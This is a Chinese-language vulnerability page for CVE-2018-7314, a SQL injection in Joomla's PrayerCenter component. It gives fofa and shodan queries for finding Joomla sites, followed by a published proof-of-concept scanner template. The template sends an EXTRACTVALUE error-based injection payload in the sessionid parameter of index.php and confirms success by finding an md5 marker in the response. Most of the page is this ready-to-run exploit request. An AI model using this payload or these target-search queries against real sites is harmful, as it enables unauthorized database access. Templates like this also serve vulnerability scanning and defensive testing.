CVE-2018-7314: Joomla SQL Inject

日期: 2025-09-01 | 影响软件: 未知 | POC: 已公开

漏洞描述

Joomla SQL Inject fofa: app="Joomla" shodan: http.html:"Joomla"

PoC代码[已公开]

id: CVE-2018-7314

info:
  name: Joomla SQL Inject
  author: 南方有梦
  severity: critical
  description: |-
    Joomla SQL Inject
    fofa: app="Joomla"
    shodan: http.html:"Joomla"
  reference:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7314
    - https://nvd.nist.gov/vuln/detail/CVE-2018-7314
    - https://www.tenable.com/security/tns-2018-04
  tags: cve,cve2018,joomla,sqli
  created: 2023/08/10

set:
  r1: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{r1}})))-- X
    expression: response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
expression: r0()